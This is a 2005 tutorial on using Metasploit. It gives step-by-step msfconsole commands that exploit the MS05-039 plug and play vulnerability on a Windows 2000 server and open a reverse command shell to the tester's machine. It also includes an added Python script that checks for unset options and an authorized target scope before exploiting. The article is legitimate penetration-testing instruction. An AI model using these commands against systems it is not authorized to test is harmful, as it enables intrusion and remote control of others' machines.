Using Metasploit for real-world security tests


Kevin Beaver
11.03.2005

This tip originally appeared on SearchWindowsSecurity.com, a sister site of SearchSMB.com.


In a recent tip, I introduced the benefits of using the Metasploit Framework for security testing. The Perl-based Metasploit was designed to be a robust exploit development system. It just so happens that you can use it to run previously developed exploits against your own systems. You can use its security testing features to see if your systems are vulnerable to penetration and how they react when specific payloads are sent their way.

Apart from common Web application tests such as SQL injection and input tampering, which it does not support, Metasploit has exploit code for a wide range of vulnerabilities in standalone applications, Web servers, operating systems, and more -- 100 exploits and 75 payloads in version 2.4 to be exact. Version 2.5 was just released which, according to the Metasploit site, includes bug fixes, cosmetic changes, and 32 more exploits! Even with over 100 exploits to choose from, obviously this isn't enough to exploit every possible vulnerability in every penetration testing scenario you come across. But then again, the framework was built so you can write your own if you're so inclined.

In this installment, I'll outline how you can use Metasploit's built-in exploits and payloads in a real-world testing scenario. Be forewarned that it's possible to create undesired results with this tool when performing your tests, such as crashing production systems or leaving them in an unstable state. As with any ethical hacking venture, proceed with caution and have a contingency plan in the event something goes awry. Please don't take this lightly.

Common Commands
Before jumping into the specific steps to execute this exploit, there are some common msfconsole commands you should know about:

The Proof's in the Penetration
Now that I've described the basic commands you'll need, let's take a look at some specific steps and screen shots required to carry out a real-world exploit.

My test target in this example is a Windows 2000 Server system that has the MS05-039 plug and play vulnerability (CVE-2005-1983) that was exploited by the Zotob worm. This hole -- which Metasploit happens to have an exploit for -- allows arbitrary code execution, including shell (command prompt) access to the system. I know my target system has this vulnerability because I discovered the problem with the vulnerability assessment tool QualysGuard. Scanning first is part of a sound ethical hacking methodology, but it's not required. You can blindly test your systems -- or, even better -- Metasploit can do some of the legwork for you with its "check" function to see if a system is vulnerable before exploiting it. More on this below. My testing system is a Windows XP SP2 system running the Metasploit Framework version 2.4 that I downloaded and installed from here. I'll use Metasploit's most commonly used msfconsole interface to demonstrate this attack.

Step 1
I load msfconsole (via Start/Programs/Metasploit Framework/MSFConsole) and its command prompt comes up:

[IMAGE]
Note: At this point you can enter show exploits to see which exploits are available for your target system.

Step 2
I enter use ms05_039_pnp to load the specific exploit I know the system is vulnerable to, and it opens that exploit's environment prompt (hence the ms05_039_pnp > prompt):

[IMAGE]

Step 3
I then enter show payloads to determine which payloads can be sent via this exploit:

[IMAGE]

Step 4
I decide to have the exploit open up a reverse command shell, so I enter set PAYLOAD win32_reverse. I then enter show targets to determine which operating systems and applications are supported. In this case, I'll set my target to the option that supports versions of Windows 2000 from Service Pack 0 (the first version of Windows 2000) through Service Pack 4 by entering set TARGET 0:

[IMAGE]

Step 5
I then enter show options to determine the required exploit and payload parameters that have no defaults and, therefore, must be set. In this case, it's the RHOST and LHOST parameters, which can be set via set RHOST 10.0.0.200 and set LHOST 10.0.0.201:

[IMAGE]

Step 6
I enter show options one final time to make sure everything is set correctly and then enter check to confirm that my target system is indeed vulnerable to the ms05_039_pnp vulnerability.

[IMAGE]

Step 7
Finally, I enter exploit to run the exploit and send the payload to my target system -- and voila -- the connection is established and I have a command prompt on the remote system! Penetration testing at its finest:

[IMAGE]

You can imagine what could happen at this point if a malicious hacker compromised your system in this way. That's why it's so important to "hack" your own systems first so you can find and plug the holes before the bad guys exploit them.
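Steps 5 and 6 are where a test goes wrong in practice: a required option left unset, or a target address typed from the wrong scan report. The following is an added example, not code from the original tip or from the Metasploit project. It reproduces by script what those two steps do by hand: it parses the table that show options prints, reports required parameters that have neither a default nor a set value, and refuses to proceed when RHOST falls outside the address range you are authorized to test. The sample show options text is constructed to resemble the Metasploit 2.x layout; the column names and values are illustrative, not captured from a real session.

```python
"""
Pre-flight check for an msfconsole exploit session (added example).

Mirrors Steps 5 and 6 of the tip: read the `show options` table, find
required parameters that still have no value, and confirm the target is
inside the authorized test scope before `exploit` is ever typed.
"""
import ipaddress

# Constructed sample of `show options` output for ms05_039_pnp with the
# win32_reverse payload selected. Layout approximated from Metasploit 2.x;
# values are illustrative, not a real capture.
SAMPLE_SHOW_OPTIONS = """\
Exploit and Payload Options
===========================

  Exploit:    Name      Default    Description
  --------    ------    -------    ------------------------------
  required    RHOST                The target address
  required    RPORT     445        The target port
  optional    SMBPIPE   browser    The pipe name to use

  Payload:    Name      Default    Description
  --------    ------    -------    ------------------------------
  required    LHOST                Local address to receive connection
  required    LPORT     4321       Local port to receive connection

  Target: Windows 2000 SP0-SP4
"""


def parse_show_options(text):
    """Return a list of option dicts parsed from `show options` text.

    Column boundaries are taken from each section header line ("Name",
    "Default", "Description"), so an empty Default cell is read as no
    default rather than swallowing the first word of the description.
    """
    options = []
    section = None
    cols = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith(("Exploit:", "Payload:")) and "Default" in line:
            section = stripped.split(":")[0]
            cols = (line.index("Name"), line.index("Default"), line.index("Description"))
            continue
        if cols is None or not stripped.startswith(("required", "optional")):
            continue
        name_col, default_col, desc_col = cols
        options.append({
            "section": section,
            "name": line[name_col:default_col].strip(),
            "required": stripped.startswith("required"),
            "default": line[default_col:desc_col].strip() or None,
            "description": line[desc_col:].strip(),
        })
    return options


def missing_required(options, settings):
    """Names of required options with neither a default nor a `set` value."""
    return [o["name"] for o in options
            if o["required"] and o["default"] is None and not settings.get(o["name"])]


def preflight(options_text, settings, authorized_scope):
    """Return (ok, problems). No problems means the session is ready to `exploit`.

    `settings` holds the values given with `set NAME value`; `authorized_scope`
    is a list of CIDR strings the tester is permitted to touch.
    """
    options = parse_show_options(options_text)
    problems = [f"{name} is required but not set" for name in missing_required(options, settings)]
    rhost = settings.get("RHOST")
    if rhost:
        try:
            target = ipaddress.ip_address(rhost)
        except ValueError:
            problems.append(f"RHOST {rhost!r} is not an IP address")
        else:
            if not any(target in ipaddress.ip_network(net) for net in authorized_scope):
                problems.append(f"RHOST {rhost} is outside the authorized test scope")
    return (not problems, problems)


if __name__ == "__main__":
    # Same values as the tip's Step 5; scope is a constructed lab range.
    session = {"RHOST": "10.0.0.200", "LHOST": "10.0.0.201"}
    ok, problems = preflight(SAMPLE_SHOW_OPTIONS, session, ["10.0.0.0/24"])
    print("ready" if ok else "not ready", problems)
```

Run it once with the options empty to see the same two names (RHOST and LHOST) that show options flagged in Step 5, then again after they are set. The scope check is the piece msfconsole will not do for you: keep the authorized ranges in the script and the tool cannot be pointed at a production host by a typo.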

There's More to Come
This exploit is just one example of what can be done using Metasploit during penetration testing. The good thing is that outside of the specific exploit and payload I used, most of the commands and techniques in this example can apply directly to other Metasploit-supported exploits.

Once you're used to how Metasploit operates, you'll be glad to know that it contains several advanced features. You can save your "set" options, log your actions, and even define how each payload will clean up after itself once it's done running. The neat thing about Metasploit is that it's so powerful yet so easy to use. The msfconsole is very intuitive and help is always just a command away.

I encourage you to play around with Metasploit in a test environment to see for yourself what it can do. It's an enlightening proof of concept tool to say the least. If you stay plugged into the Metasploit Project's Web site, you can stay abreast of the latest framework and exploit releases. Apparently, a new and improved version of Metasploit (version 3) written in the Ruby programming language is due out soon, so be on the lookout for it as well.

It pleases me that we've got such advanced tools like Metasploit at our disposal for the betterment of information security -- especially for the low, low price of $0 in this case. These types of exploit tools will certainly play a vital role in the future of improving the overall quality of software, so the more you know about them the better. With a quick Metasploit download, easy install, and a few minutes familiarizing yourself with its interface, the future is all yours.

About the author: Kevin Beaver is an independent information security consultant, author, and speaker with Atlanta-based Principle Logic, LLC. He has more than 17 years of experience in IT and specializes in performing information security assessments. Kevin has written five books including Hacking For Dummies (Wiley), Hacking Wireless Networks For Dummies, and The Practical Guide to HIPAA Privacy and Security Compliance (Auerbach). He can be reached at kbeaver @ principlelogic.com.
